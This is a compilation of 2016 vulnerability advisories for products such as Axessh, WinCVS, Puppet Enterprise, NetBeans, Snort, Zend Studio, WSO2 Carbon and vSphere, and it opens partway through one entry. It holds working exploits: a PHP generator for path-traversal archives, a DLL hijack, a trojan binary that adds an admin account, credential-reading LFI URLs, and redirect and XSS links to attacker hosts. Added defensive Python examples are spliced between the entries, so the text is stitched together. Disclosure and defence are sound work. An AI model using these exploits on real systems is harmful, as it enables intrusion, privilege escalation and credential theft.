CSRF Remote Command Execution



CVE Reference:
==
N/A



Vulnerability Details:
=

There is a Remote Command Execution ailment in this IDE: if a user of this IDE 
is running the internal debug server
listening on localhost port 89 and they open a link or visit a malicious 
webpage, then remote attackers can execute arbitrary
commands on the victim's system.

Reference:
http://forums.blumentals.net/viewtopic.php?f=15=7062


Exploit code(s):


Call Windows "calc.exe" as POC

http://127.0.0.1:89/~C/Windows/system32/calc.exe;>Click it!

OR

http://127.0.0.1:89/~C/Windows/system32/calc.exe; method="post">
document.forms[0].submit()




Disclosure Timeline:
=
Vendor notification:  October 5, 2016
Vendor confirms vulnerability: October 7, 2016
Vendor releases fixed version: November 1, 2016
November 2, 2016 : Public Disclosure




Severity Level:

High




hyp3rlinx


Axessh 4.2.2 Denial Of Service

2016-11-07 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt

[+] ISR: ApparitionSec



Vendor:

www.labf.com



Product:
=
Axessh 4.2.2

Axessh is an SSH client. It is a superb terminal emulator/telnet client for 
Windows. It provides SSH capabilities to Axessh without
sacrificing any existing functionality. Furthermore, Axessh has been 
developed entirely outside of the USA, and can be sold
anywhere in the world (apart from places where people aren't allowed to own 
cryptographic software).

2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, 
AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection 
forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested 
port forwarding 



Vulnerability Type:

Denial Of Service

AxeSSH will crash after receiving an overly long payload of junk...



Exploit code(s):
===

1) Open the settings window for axessh and choose Run, then click Run as EXE;
this will launch "xwpsshd.exe", which crashes with a bad protocol version
when sent the payload.


import socket

print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"

ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)



Exploitation Technique:
===
Remote



Severity Level:

Medium




hyp3rlinx


wincvs-2.0.2.4 Privilege Escalation

2016-10-25 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINCVS-PRIVILEGE-ESCALATION.txt

[+] ISR: ApparitionSec



Vendor:
==
cvsgui.sourceforge.net
www.wincvs.org


Product:
===
WinCvs v2.1.1.1 (Build 1)
downloads as wincvs-2.0.2.4
v2.0.2.4 


WinCVS is a free app for Windows that will help you simplify the development of 
files for groups of people working on
the same software project.


Vulnerability Type:
=
Privilege Escalation



CVE Reference:
==
N/A



Vulnerability Details:
=

WinCvs.exe installs a service with an unquoted service path running with SYSTEM 
privileges. To exploit it, a local attacker must place 
a malicious executable file named "Program.exe" in the path of the service. 
After a service restart or system reboot, this could
potentially allow an authorized local user to execute arbitrary code with 
elevated privileges on the system.



Proof:
==

C:\Users\hyp3rlinx>sc qc CVS
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CVS
TYPE   : 110  WIN32_OWN_PROCESS (interactive)
START_TYPE : 2   AUTO_START
ERROR_CONTROL  : 1   NORMAL
BINARY_PATH_NAME   : C:\Program Files (x86)\cvsnt\cvsservice.exe
LOAD_ORDER_GROUP   :
TAG: 0
DISPLAY_NAME   : CVSNT
DEPENDENCIES   :
SERVICE_START_NAME : LocalSystem
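Added audit example (not part of the advisory, and not WinCVS/CVSNT code): a Python
check that parses `sc qc` output like the proof above, decides whether the image path is
unquoted and contains spaces, lists the paths CreateProcess would try in order (which is
why a file named "Program.exe" in C:\ matters) so their directories can be checked for
non-admin write access, and prints the `sc config ... binPath=` command that quotes the
path. The sample output is a constructed copy of the proof above; function names are my
own.

```python
import re

# Constructed sample modelled on the `sc qc CVS` output above.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CVS
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\cvsnt\cvsservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : CVSNT
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# The same service after quoting the path (constructed "fixed" output).
SAMPLE_SC_QC_FIXED = SAMPLE_SC_QC.replace(
    r"C:\Program Files (x86)\cvsnt\cvsservice.exe",
    r'"C:\Program Files (x86)\cvsnt\cvsservice.exe"')


def field(sc_output: str, name: str):
    """Pull one `NAME : value` field out of `sc qc` output."""
    m = re.search(rf"^\s*{re.escape(name)}\s*:\s*(.*?)\s*$", sc_output, re.M)
    return m.group(1) if m else None


def lookup_candidates(binary_path: str):
    """Paths CreateProcess tries, in order, for an unquoted path containing spaces.

    Each prefix ending at a space is tried first (with ".exe" appended when
    it has no extension); the search stops at the first file that exists.
    """
    parts = binary_path.split(" ")
    cands = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):   # the real image (with arguments after it)
            cands.append(prefix)
            break
        cands.append(prefix + ".exe")
    else:
        cands.append(binary_path)
    return cands


def audit_service(sc_output: str):
    """Report whether a service's image path is unquoted and contains spaces."""
    name = field(sc_output, "SERVICE_NAME") or "?"
    path = field(sc_output, "BINARY_PATH_NAME") or ""
    account = field(sc_output, "SERVICE_START_NAME") or ""
    unquoted = (" " in path) and not path.startswith('"')
    report = {
        "service": name,
        "binary_path": path,
        "runs_as": account,
        "unquoted": unquoted,
        "lookup_candidates": lookup_candidates(path) if unquoted else [],
    }
    if unquoted:
        # Remediation: quote the image path in the service configuration.
        report["fix"] = f'sc config {name} binPath= "\\"{path}\\""'
    return report


if __name__ == "__main__":
    for key, value in audit_service(SAMPLE_SC_QC).items():
        print(f"{key}: {value}")
```

Run it on real output with `sc qc <service>` piped into the script; every directory named by a candidate other than the last one should be writable only by administrators.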



Exploitation Technique:
===
Local



Severity Level:

Medium





hyp3rlinx


Puppet Enterprise Web Interface User Enumeration

2016-10-22 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PUPPET-USER-ENUMERATION.txt

[+] ISR: ApparitionSec



Vendor:
==
www.puppet.com



Product:
===
Puppet Enterprise Web Interface

Tested in version < 2016.4.0

Puppet Enterprise is the leading platform for automatically delivering, 
operating and securing your infrastructure.



Vulnerability Type:
===
User Enumeration



CVE Reference:
==
N/A



Vulnerability Details:
=

By sending remote HTTP requests to the Puppet Enterprise Web Interface it is 
possible to enumerate valid user account names by sending more than 10 requests.
If the user does not exist we continue to get the 'Authentication failed.' HTTP 
response from the victim server. However, if the user does exist we
no longer receive such a message, confirming the user exists. 



Exploit code(s):


Send the login request 11 times; after 10 we will know if the user exists or not.

FOR /l %i in (1,1,11) DO curl -k  
https://victim-puppet-server/auth/login?redirect=Enum-Users  -d 
username=IDONTEXIST -d password=1

HTTP 200 OK
'Authentication failed.'

FOR /l %i in (1,1,11) DO curl -k  
https://victim-puppet-server/auth/login?redirect=Enum-Users -d username=BOZO -d 
password=1 

HTTP 200 OK



Disclosure Timeline:
===
Vendor Notification:  August 23, 2016
Vendor Acknowledgement: August 23, 2016
Vendor Releases Version: 2016.4.0
October 17, 2016  : Public Disclosure




Severity Level:

Low




hyp3rlinx


Puppet Enterprise Web Interface Authentication Redirect

2016-10-22 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PUPPET-AUTHENTICATION-REDIRECT.txt

[+] ISR: ApparitionSec



Vendor:
==
www.puppet.com



Product:

Puppet Enterprise Web Interface 
Version < 2016.4.0

Puppet Enterprise is the leading platform for automatically delivering, 
operating and securing your infrastructure.


Vulnerability Type:
=
Authentication Redirect



CVE Reference:
==
CVE-2016-5715



Vulnerability Details:
=

When logging into the Puppet Enterprise Web Interface, users can be redirected to 
attacker-controlled servers; if a user logs in
using an attacker-supplied authentication link it can result in credential 
theft etc.

Fixed in version 2016.4.0

References:
https://puppet.com/security/cve/cve-2016-5715


Exploit code(s):
===

To bypass the character filters you need to pass double forward slashes "//", or the 
redirect will fail.

https://victim-puppet-server/auth/login?redirect=//attacker-server
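Added defensive example (not part of the advisory, and not Puppet's code): the filter
that was bypassed with "//" looked at characters rather than at where the URL resolves.
The Python below validates a post-login `redirect` parameter by decoding it once,
refusing anything with a scheme, authority, backslash or leading double slash, and
finally resolving it against the site origin to confirm the host is unchanged. The
origin, host names and function names are my own assumptions.

```python
from urllib.parse import unquote, urljoin, urlsplit

# Assumed origin of the Puppet console; only targets that stay on it are accepted.
SITE_ORIGIN = "https://victim-puppet-server"


def is_safe_redirect(target, origin=SITE_ORIGIN) -> bool:
    """Accept only a same-origin path for the post-login `redirect` parameter.

    The checks are ordered so that the bypass from the advisory ("//host",
    a scheme-relative URL) and its close relatives (encoded slashes,
    backslashes, three slashes, absolute URLs) are all refused.
    """
    if not target:
        return False
    t = unquote(target).strip()          # decode once: "%2F%2F" must not hide "//"
    if not t or any(ord(c) < 0x20 or c == "\x7f" for c in t):
        return False
    if "\\" in t:                        # browsers turn "/\host" into "//host"
        return False
    if t.startswith("//"):               # "//host" and "///host" both leave the site
        return False
    parts = urlsplit(t)
    if parts.scheme or parts.netloc:     # "https://host/...", "javascript:..."
        return False
    resolved = urlsplit(urljoin(origin + "/", t))
    site = urlsplit(origin)
    return (resolved.scheme, resolved.netloc) == (site.scheme, site.netloc)


def login_redirect_target(requested, default="/") -> str:
    """Where the login handler should send the user after authentication."""
    return requested if is_safe_redirect(requested) else default


if __name__ == "__main__":
    # Constructed inputs: two legitimate targets and the bypass forms.
    for candidate in ["/auth/dashboard", "Enum-Users", "//attacker-server",
                      "%2F%2Fattacker-server", "/\\attacker-server",
                      "https://attacker-server/auth/login"]:
        print(f"{candidate!r:40} -> {login_redirect_target(candidate)}")
```

The final resolve step is the one that matters most: a blocklist of characters can always be extended, but "does the resolved URL still point at this host" is a single question the handler can answer for any input.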



Disclosure Timeline:
==
Vendor Notification: August 23, 2016
Vendor Acknowledgement: August 23, 2016
Vendor Releases Fix: in version 2016.4.0
October 17, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Medium





hyp3rlinx


Oracle Netbeans IDE v8.1 Import Directory Traversal

2016-10-22 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ORACLE-NETBEANS-IDE-DIRECTORY-TRAVERSAL.txt

[+] ISR: ApparitionSec



Vendor:
===
www.oracle.com



Product:
=
Netbeans IDE v8.1



Vulnerability Type:
=
Import Directory Traversal  



CVE Reference:
==
CVE-2016-5537



Vulnerability Details:
=

This was part of Oracle Critical Patch Update for October 2016.

Vulnerability in the NetBeans component of Oracle Fusion Middleware 
(subcomponent: Project Import).
The supported version that is affected is 8.1. Easily exploitable vulnerability 
allows high privileged attacker with logon
to the infrastructure where NetBeans executes to compromise NetBeans. While the 
vulnerability is in NetBeans, attacks may significantly
impact additional products. Successful attacks of this vulnerability can result 
in unauthorized update, insert or delete access to some
of NetBeans accessible data as well as unauthorized read access to a subset of 
NetBeans accessible data and unauthorized ability to cause
a partial denial of service (partial DOS) of NetBeans. 

Vulnerability in the way Netbeans processes ".zip" archives to be imported as a
project. If a user imports a malicious project 
containing "../" characters the import will fail, yet the "../" is still processed.
We can then place malicious scripts outside of
the target directory and inside the web root if the user is running a local server 
etc...

It may then be possible to execute remote commands on the affected system by 
later visiting the URL and accessing our script if that
web server is public facing; if it is not, it may still be subject to abuse 
internally by malicious users. Moreover,
it is also possible to overwrite files on the system hosting vulnerable 
versions of NetBeans IDE.


References:
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixFMW


Exploit Code(s):
=

, , ";exit();}
 $zipname=$argv[1];
 $exploit_file="RCE.php";
 $cmd='';
 if(!empty($argv[2])&_numeric($argv[2])){
 $depth=$argv[2];
 }else{
 echo "Second flag  must be numeric!, you supplied '$argv[2]'";
 exit();
 }
 if(strtolower($argv[3])!="y"){
 if(!empty($argv[3])){
 $exploit_file=$argv[3];
 }
 if(!empty($argv[4])){
 $cmd=$argv[4];
 }else{
 echo "Usage: enter a payload for file $exploit_file wrapped in double
 quotes";
 exit();
 }
 }
 $zip = new ZipArchive();
 $res = $zip->open("$zipname.zip", ZipArchive::CREATE);
 $zip->addFromString(str_repeat("..\\",
 $depth)."\\xampp\\htdocs\\".$exploit_file, $cmd);
 $zip->close();
 echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
 echo " hyp3rlinx ===";
?>
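Added defensive example (not part of the advisory, and not NetBeans code): the import
path above fails because archive member names are joined onto the target directory
without checking where they end up. The Python below validates each member name before
extraction, treating backslashes as separators (the generator above writes "..\\.."
entries) and refusing "..", absolute and drive-letter paths, then re-checks the
resolved target path as a second line of defence. The sample archive is constructed in
memory; file names and function names are my own.

```python
import io
import zipfile
from pathlib import Path


def is_safe_member_name(name: str) -> bool:
    """True only for a relative member name that cannot escape the project root.

    Backslashes count as separators because the archive may have been built
    on Windows, and Windows extractors treat them that way.
    """
    if not name or "\x00" in name:
        return False
    n = name.replace("\\", "/")
    if n.startswith("/"):                      # absolute POSIX path
        return False
    if len(n) > 1 and n[1] == ":":             # drive-letter path such as C:/...
        return False
    return all(part != ".." for part in n.split("/"))


def audit_zip(zip_bytes: bytes):
    """Split an archive's members into those safe to extract and those rejected."""
    safe, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            (safe if is_safe_member_name(info.filename) else rejected).append(info.filename)
    return safe, rejected


def safe_extract(zip_bytes: bytes, dest: str):
    """Extract only the safe members, re-checking each resolved target path."""
    root = Path(dest).resolve()
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not is_safe_member_name(info.filename):
                continue
            target = (root / info.filename.replace("\\", "/")).resolve()
            if target != root and root not in target.parents:
                continue                       # belt and braces: symlinks, odd names
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
            else:
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_bytes(zf.read(info))
                written.append(str(target.relative_to(root)))
    return written


def build_sample_zip() -> bytes:
    """Constructed archive: two legitimate project files plus traversal entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("project/nbproject/project.xml", b"<project/>")
        zf.writestr("project/src/Main.java", b"class Main {}")
        zf.writestr("../../xampp/htdocs/evil.php", b"<?php /* constructed placeholder */ ?>")
        zf.writestr("..\\..\\xampp\\htdocs\\evil.php", b"<?php /* constructed placeholder */ ?>")
        zf.writestr("/etc/passwd", b"constructed")
        zf.writestr("C:\\Windows\\Temp\\evil.exe", b"constructed")
    return buf.getvalue()


if __name__ == "__main__":
    import tempfile
    safe, rejected = audit_zip(build_sample_zip())
    print("safe:", safe)
    print("rejected:", rejected)
    with tempfile.TemporaryDirectory() as d:
        print("written:", safe_extract(build_sample_zip(), d))
```

Note that the name check alone is not enough on a real filesystem (an earlier member could create a symlink that a later one follows), which is why `safe_extract` resolves every target and compares it against the root again.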


Disclosure Timeline:
===
Vendor Notification: September 20, 2016
October 20, 2016 : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:
=
CVSS VERSION 3.0 RISK 
5.7




hyp3rlinx


Snort v2.9.7.0-WIN32 DLL Hijack

2016-10-13 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/SNORT-DLL-HIJACK.txt

[+] ISR: ApparitionSec



Vendor:
=
www.snort.org



Product:
===
Snort v2.9.7.0-WIN32

Snort is an open-source, free and lightweight network intrusion detection 
system (NIDS) software for Linux and Windows to detect emerging threats.


Vulnerability Type:
===
DLL Hijack



CVE Reference:
==
CVE-2016-1417



Vulnerability Details:
=

snort.exe can be exploited to execute arbitrary code on a victim's system via DLL 
hijacking; the vulnerable DLL is "tcapi.dll".
This occurs if a user opens a ".pcap" file from a remote share using snort.exe and
the DLL exists in that directory. 


Exploit code(s):
=

Create tcapi.dll 

#include <windows.h>

//gcc -c tcapi.c
//gcc -shared -o tcapi.dll tcapi.o

// PoC payload: shows a message box when the DLL is loaded by snort.exe
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, "DLL Hijacking", "Done!", MB_OK);
    break;
  }

  return TRUE;  // returning FALSE on DLL_PROCESS_ATTACH would make the load fail
}

1) create any empty file on a remote dir share with a .pcap extension
2) place arbitrary DLL named  "tcapi.dll" in remote share
3) open with snort.exe
4) BAM!




Disclosure Timeline:
===
Vendor Notification:  April 21, 2016
September 29, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Medium





hyp3rlinx


ZendStudio IDE v13.5.1 Privilege Escalation

2016-10-13 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ZEND-STUDIO-PRIVILEGE-ESCALATION.txt

[+] ISR: ApparitionSec



Vendor:

www.zend.com



Product:
==
ZendStudio IDE v13.5.1

Zend Studio is the leading PHP IDE. It is the only PHP IDE that combines mobile 
development with PHP and includes a sample mobile
app with source code.



Vulnerability Type:
=
Privilege Escalation



CVE Reference:
==
N/A


Vulnerability Details:
=

ZendStudio IDE uses weak, insecure permission settings on its files/directory, 
as the "Everyone" group has full access on it.
This allows low privileged users to execute arbitrary code in the security context 
of ANY other user with elevated privileges
on the affected system.

"Everyone" encompasses all users who have logged in with a password as well as 
built-in, non-password protected accounts such as Guest
and LOCAL_SERVICE.

Any user (even guest) will be able to replace, modify or change the file. This 
would allow an attacker the ability to inject code or
replace the ZendStudio executable and have it run in the context of the system.


e.g.

c:\Program Files (x86)\Zend\Zend Studio 13.5.1> icacls ZendStudio.exe

ZendStudio.exe Everyone:(I)(F)
   NT AUTHORITY\SYSTEM:(I)(F)
   BUILTIN\Administrators:(I)(F)
   BUILTIN\Users:(I)(RX)


x86_64 version ...


c:\Program Files\Zend>icacls * | more
Zend Studio 13.5.1 Everyone:(F)
   Everyone:(OI)(CI)(IO)(F)
   NT SERVICE\TrustedInstaller:(I)(F)
   NT SERVICE\TrustedInstaller:(I)(CI)(I
   NT AUTHORITY\SYSTEM:(I)(F)
   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F
   BUILTIN\Administrators:(I)(F)
   BUILTIN\Administrators:(I)(OI)(CI)(IO
   BUILTIN\Users:(I)(RX)
   BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
   CREATOR OWNER:(I)(OI)(CI)(IO)(F)
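Added audit example (not part of the advisory, and not Zend's code): a Python parser
for `icacls` output like the listings above that flags ACEs granting write-class rights
(F, M, W and the specific/generic write flags) to broad principals such as Everyone or
BUILTIN\Users, and produces the `icacls /remove:g` command that strips such a grant. The
sample listings are constructed from the complete lines shown above; the principal list,
rights set and function names are my own.

```python
import re

# Constructed sample, modelled on the icacls output above (complete lines only).
SAMPLE_ICACLS = r"""
ZendStudio.exe Everyone:(I)(F)
               NT AUTHORITY\SYSTEM:(I)(F)
               BUILTIN\Administrators:(I)(F)
               BUILTIN\Users:(I)(RX)
"""

# The same file after removing the Everyone ACE (constructed "hardened" output).
SAMPLE_ICACLS_HARDENED = r"""
ZendStudio.exe NT AUTHORITY\SYSTEM:(I)(F)
               BUILTIN\Administrators:(I)(F)
               BUILTIN\Users:(I)(RX)
"""

# Principal followed by one or more "(...)" right groups at the end of the line.
# Known multi-word principals are listed first so "NT AUTHORITY\SYSTEM" is not
# split at its space; the file name before the first ACE never ends in ":(".
_ACE_RE = re.compile(
    r"(Everyone|CREATOR OWNER|NT AUTHORITY\\[^:]+|NT SERVICE\\[^:]+|"
    r"BUILTIN\\[^:]+|[^\s:\\]+\\[^\s:]+|[^\s:]+):((?:\([^)]*\))+)\s*$")

# Principals that mean "any user on the box".
BROAD_PRINCIPALS = {"everyone", "builtin\\users", "users",
                    "nt authority\\authenticated users", "authenticated users",
                    "nt authority\\interactive"}

# Simple and specific rights that let the holder replace or alter the file.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "D", "DC", "GA", "GW"}


def parse_icacls(text: str):
    """Return [(principal, [rights...])] for every ACE line that parses."""
    aces = []
    for line in text.splitlines():
        m = _ACE_RE.search(line)
        if not m:
            continue
        principal, groups = m.group(1), m.group(2)
        rights = [r for g in re.findall(r"\(([^)]*)\)", groups)
                  for r in g.split(",") if r]
        aces.append((principal, rights))
    return aces


def find_weak_aces(text: str):
    """ACEs granting write-class rights to a broad principal."""
    findings = []
    for principal, rights in parse_icacls(text):
        if principal.lower() in BROAD_PRINCIPALS and WRITE_RIGHTS & set(rights):
            findings.append({"principal": principal,
                             "rights": rights,
                             "write_rights": sorted(WRITE_RIGHTS & set(rights))})
    return findings


def remediation(path: str, principal: str) -> str:
    """icacls command that strips the granted rights from the broad principal."""
    return f'icacls "{path}" /remove:g "{principal}" /t'


if __name__ == "__main__":
    for f in find_weak_aces(SAMPLE_ICACLS):
        print(f"{f['principal']} holds {f['write_rights']}")
        print("  fix:", remediation(r"C:\Program Files (x86)\Zend\Zend Studio 13.5.1",
                                    f["principal"]))
```

Inherit-only entries such as "(OI)(CI)(IO)(F)" on the install directory are flagged too, since they propagate to every file created beneath it.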



Exploit code(s):
===

1) Compile below 'C' code name it as "ZendStudio.exe"


#include <windows.h>
#include <stdlib.h>

int main(void){
  system("net user hacker abc123 /add");
  system("net localgroup Administrators hacker  /add");
  system("net share SHARE_NAME=c:\\ /grant:hacker,full");
  WinExec("C:\\Program Files (x86)\\Zend\\Zend Studio 13.5.1\\~ZendStudio.exe",0);
  return 0;
} 


2) Rename original "ZendStudio.exe" to "~ZendStudio.exe"


3) Place our malicious "ZendStudio.exe" in the ZendStudio directory


4) Logout and wait for a more privileged user to login and use ZendStudio IDE 
then BOOM! later,
go back and login with your shiny new account.



Disclosure Timeline:

Vendor Notification: September 30, 2016
October 8, 2016 : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:
===
High




hyp3rlinx


WSO2-CARBON v4.4.5 LOCAL FILE INCLUSION

2016-08-15 Thread apparitionsec
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt

[+] ISR: ApparitionSec


Vendor:
===
www.wso2.com



Product:

Ws02Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. 
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and 
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware 
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific 
features needed to solve a specific enterprise scenario.



Vulnerability Type:
=
Local File Inclusion (LFI)



CVE Reference:
==
CVE-2016-4314



Vulnerability Details:
=

An authenticated user can download arbitrary files from the filesystem via the 
downloadArchivedLogFiles operation of the LogViewer admin service.
The request accepts a file path that is resolved relative to the Carbon log 
directory (i.e. /repository/logs) without checking that the result stays inside it,
so "../" sequences reach any file the server process can read.


References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098


Example: reading registry.xml via the Local File Inclusion exposes the 
MySQL credentials in its dbConfig block:

<dbConfig name="mysql-db">
    <url>jdbc:mysql://localhost:3306/regdb</url>
    <userName>regadmin</userName>
    <password>regadmin</password>
    <driverName>com.mysql.jdbc.Driver</driverName>
    <maxActive>80</maxActive>
    <maxWait>6000</maxWait>
    <minIdle>5</minIdle>
</dbConfig>




Exploit code(s):
===

LFI to read Database creds, truststore key file, web.xml etc...

1) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml==

2) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml

3) Access Truststore Key file.
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks
 

4) Read web.xml
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml



Disclosure Timeline:
===
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:
===
High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX


VMWare vSphere Web Client Flash XSS

2016-05-25 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/VMWARE-VSPHERE-FLASH-XSS.txt

[+] ISR: apparitionsec




Vendor:
===
www.vmware.com



Product:

VMWare vSphere Web Client v5.1 - 6.0

A server virtualization platform from VMware. Also referred to as a cloud 
operating system or virtualized data center platform, VMware vSphere enables
IT departments to efficiently place application workloads on the most 
cost-effective compute resource available

VMware vSphere includes the VMware ESX / ESXi hypervisor, a type 1 hypervisor 
that functions as the virtualization server; the VMware vCenter Server,
which manages vSphere environments; the VMware vSphere Client, which is used to 
install and manage virtual machines through the hypervisor; and
VMware VMFS, the file system component from VMware.


Vulnerability Type:

Flash XSS



CVE Reference:
==
CVE-2016-2078



Vulnerability Details:
=

VMWare vSphere Web Client is vulnerable to Flash-based XSS through the loading 
of arbitrary .SWF files via the 'flashvars' parameter. Flashvars is a
Flash Player feature that allows passing variables to the '_root' level of a 
Flash movie from the hosting webpage. Attackers can exploit this
to call arbitrary Flash ActionScript functions in the victim's Flash Player 
client through attacker-supplied SWF files that execute in the same
security context as that of the vSphere Web Client.


e.g.


flashvars: 
'locale=en_US=en_US=locales/UI-en_US.swf=http%3A%2F%2Fattacker-site%2FEvil.swf',



References:

VMSA-2016-0006

http://www.vmware.com/security/advisories/VMSA-2016-0006.html



Exploit code(s):
===


1) The attacker's server needs a Flash policy file "crossdomain.xml". It grants Flash 
content loaded from one server (here the vSphere Web Client) permission to read from
another server (the attacker's); a fully permissive policy lets the victim's client 
talk to the evil server.

e.g.

<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>


2) Send the infected link to the victim. 

https://victim:9443/vsphere-client/ui.jsp?resourceModuleURLs=http://attacker-site/Evil.swf
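The fix on the server side is to stop passing client-controlled URLs into flashvars at all. The following is an added example (not VMware's code, and not part of the advisory) of the allowlist a page like ui.jsp needs before it echoes resourceModuleURLs: only same-origin, relative .swf paths under locales/ are accepted, which is an assumed policy modelled on the one legitimate value visible in the flashvars above; absolute URLs, protocol-relative URLs, javascript: and traversal are refused.

```python
from urllib.parse import urlsplit, unquote, urlencode


def is_allowed_module_url(value):
    """Accept only a same-origin relative path to a .swf under locales/.
    The allowlist itself is an assumption; the rejections are what matters."""
    decoded = unquote(value)                 # attacker values arrive %-encoded
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:         # http://attacker-site/Evil.swf, //host/..., javascript:
        return False
    if parts.query or parts.fragment:
        return False
    if decoded.startswith("/") or "\\" in decoded:
        return False
    if any(seg in ("", ".", "..") for seg in decoded.split("/")):
        return False                         # traversal or empty segment
    return decoded.startswith("locales/") and decoded.lower().endswith(".swf")


def build_flashvars(locale, module_urls):
    """Server-side construction of the flashvars string: only validated
    entries are emitted. Returns (flashvars, rejected_values)."""
    allowed = [m for m in module_urls if is_allowed_module_url(m)]
    rejected = [m for m in module_urls if not is_allowed_module_url(m)]
    pairs = [("locale", locale)] + [("resourceModuleURLs", m) for m in allowed]
    return urlencode(pairs), rejected


if __name__ == "__main__":
    # constructed inputs: the legitimate module plus the advisory's attacker URL
    print(build_flashvars("en_US", ["locales/UI-en_US.swf",
                                    "http%3A%2F%2Fattacker-site%2FEvil.swf"]))
```

Rejected values should be logged with the requesting IP: a hit on resourceModuleURLs with a foreign host is the exploit attempt itself, not a malformed request.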



Disclosure Timeline:
=
Vendor Notification: Jan 4, 2016
May 25, 2016 : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:
===
4.2 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N



Description:

Request Method(s):[+] GET


Vulnerable Product:   [+] VMWare 5.1 - 6.0 vsphere-client


Vulnerable Parameter(s):  [+] flashvars / resourceModuleURLs


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
